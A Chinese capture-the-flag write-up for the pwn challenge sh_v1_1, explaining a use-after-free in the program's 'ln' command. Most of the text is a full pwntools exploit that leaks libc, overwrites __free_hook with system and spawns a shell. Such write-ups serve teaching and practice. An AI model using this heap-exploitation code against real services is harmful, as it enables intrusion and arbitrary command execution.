【PWN专场】公开赛wp｜sh_v1_1

预览

1.题⽬名称

题目名称：sh_v1_1

2.题⽬考点

• 本题考查对程序指令逆向

• 对花指令等干扰指令排除

• UAF

3.题⽬详细解题⽅法

首先，程序中的花指令如下

是可以排除干扰的

程序主要实现了ls,rm,touch,cat,gedit等功能

漏洞点主要在ln函数，ln函数链接时，将指针保存，但是在对原始指针删除时，未删除ln链接的指针，造成指针悬挂。

exp:

`#coding=utf-8``   ``from pwn import *``   ``context.log_level = "debug"``# context.arch = "i386"``context.arch = "amd64"``   ``menu=""``sh = 0``lib = 0``elf =ELF('sh_v1_1')``libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")``   ``""" """``l64 = lambda     :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))``l32 = lambda     :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))``leak  = lambda name,data : sh.success(name + ": 0x%x" % data)``s  = lambda payload: sh.send(payload)``sa  = lambda a,b :sh.sendafter(str(a),str(b))``sl  = lambda payload: sh.sendline(payload)``sla = lambda a,b :sh.sendlineafter(str(a),str(b))``ru  = lambda a     :sh.recvuntil(str(a))``r  = lambda a     :sh.recv(str(a))``""" """``def add(name,content):`  `sla(">>>>","touch "+name)`  `sl(content)``def edit(name,content):`  `sla(">>>>","gedit "+name)`  `s(content)``def show(name):`  `sla(">>>>","cat "+name)``def delete(name):`  `sla(">>>>","rm "+name)``def ln(name,name1):`  `sla(">>>>","ln "+name+" "+name1)``def b(addr):`  `bk="b *$rebase("+str(addr)+")"`  `# bk="b *"+str(addr)`  `attach(sh,bk)`  `success("attach")``def pwn(ip,port,debug):`  `global sh`  `global libc`  `if(debug == 1):`     `sh = process("./sh_v1_1")`  `else:`     `sh = remote(ip,port)``   `  `for i in range(0,10):`     `add("freedom"+str(i),"freedom!!!")`  `ln("freedom0","freedom10") #freedom0 uaf freedom10`  `for i in range(1,8):`     `delete("freedom"+str(i))`  `delete("freedom0")`  `show("freedom10")`  `libc_base=l64()-0x10-libc.sym["__malloc_hook"]-96`  `leak("libc_base",libc_base)` `  for i in range(0,8):`     `add("freedom"+str(i),"freedom!!!")``   `  `delete("freedom1")`  `delete("freedom7")``   `  `system=libc_base+libc.sym["system"]`  `free_hook=libc_base+libc.sym["__free_hook"]-8``   `  `edit("freedom10",p64(free_hook)+"\n")`  `# b(0x000000000000219A)`  `add("freedom1","aaaa")`  `add("freedom7","/bin/sh\x00"+p64(system))`  `delete("freedom7")`  `sh.interactive()``if __name__ == "__main__":`  `pwn("0.0.0.0",9999,1)`